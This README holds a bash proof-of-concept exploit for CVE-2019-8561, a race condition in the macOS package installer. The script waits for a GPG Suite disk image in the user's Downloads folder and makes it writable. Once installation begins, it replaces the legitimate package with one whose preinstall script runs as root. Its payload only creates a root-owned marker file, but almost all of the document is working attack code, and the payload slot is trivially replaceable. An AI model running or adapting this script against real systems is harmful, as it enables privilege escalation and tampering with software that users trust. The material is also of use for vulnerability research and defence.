README.md
Rendering markdown...
#!/bin/bash
# CVE-2019-8561/gpg_poc
declare -r touch_path="/var/test"
declare -r expand_path="/tmp/Install"
echo "Waiting for GPG Suite DMG in ~/Downloads..."
while true; do
if ls "/Users/${USER}/Downloads" | grep -q 'GPG_Suite'; then
dmg_path=$(echo /Users/${USER}/Downloads/GPG_Suite-*)
echo "Found ${dmg_path}"
echo "Converting read-only DMG to RW..."
hdiutil convert -ov "${dmg_path:?}" -format UDRW -o "${dmg_path:?}"> /dev/null
# This should take 2-3 seconds
break
fi
sleep 2
# Sleep so we don't run ls 6 times a second
done
echo "Resizing DMG"
hdiutil resize -size 60m "${dmg_path}"
# Need to do this to avoid a TOCTOU issue when we delete the legit PKG
# There wont be enough space on the DMG to move the malicious PKG
# Untill the OS updates the size info of the DMG which takes ages...
echo "Waiting for PKG installer to start..."
( tail -f -n 0 /var/log/install.log & ) | grep -q 'Opened from:'
echo "PKG Install Detected"
pkg_path=$(grep 'Opened from:' /var/log/install.log | tail -1 | cut -d ' ' -f7-)
echo "Expanding PKG"
pkgutil --expand "${pkg_path}" "${expand_path}"
echo "Replacing preinstall"
preinstall_file="${expand_path}/preinstall.pkg/Scripts/preinstall"
cat <<EOF > "${preinstall_file}"
#!/bin/bash
touch /var/test
chmod +x /var/test
EOF
echo "Flattening malicious PKG..."
pkgutil --flatten "${expand_path}" "${expand_path}.pkg"
chown ${USER}:staff "${expand_path}.pkg"
# The new PKG gets created with $USER:wheel ownership which causes an error
# When moving it to another volume
echo "Removing ${pkg_path}"
rm -f "${pkg_path:?}"
echo "Replacing Install.pkg with malicious PKG"
mv "${expand_path}.pkg" "${pkg_path}"
echo "Removing Expanded PKG"
rm -rf "${expand_path:?}"
echo "Wait for it..."
( tail -f -n0 /var/log/install.log & ) | grep -q 'End install'
test_owner=$(ls -l "${touch_path}" | awk '{print $3}')
if [[ -f "${touch_path}" && "${test_owner}" == "root" ]]; then
echo "Exploit successful!"
exit 0
else
echo "Exploit unsuccessful"
exit 1
fi